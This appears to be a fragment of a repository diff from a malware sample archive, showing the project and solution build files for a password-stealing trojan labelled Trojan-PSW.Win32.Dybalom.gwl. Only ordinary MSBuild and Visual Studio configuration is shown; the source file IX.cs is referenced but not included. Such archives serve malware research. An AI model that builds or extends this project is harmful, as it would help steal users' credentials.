<ApplicationVersion>0.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Compile Include="IX.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-e39c1d1a86fe15bd92391ef49b432ac3f28478848effc93e3328ae392db7eb37/Trojan-PSW.Win32.Dybalom.gwl.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "4tkhjivf", "Trojan-PSW.Win32.Dybalom.gwl-e39c1d1a86fe15bd92391ef49b432ac3f28478848effc93e3328ae392db7eb37.csproj", "{181646B5-7CD1-4783-B41A-63E8BB743BAA}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{181646B5-7CD1-4783-B41A-63E8BB743BAA}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{181646B5-7CD1-4783-B41A-63E8BB743BAA}.Debug|Any CPU.Build.0 = Debug|Any CPU
{181646B5-7CD1-4783-B41A-63E8BB743BAA}.Release|Any CPU.ActiveCfg = Release|Any CPU
{181646B5-7CD1-4783-B41A-63E8BB743BAA}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal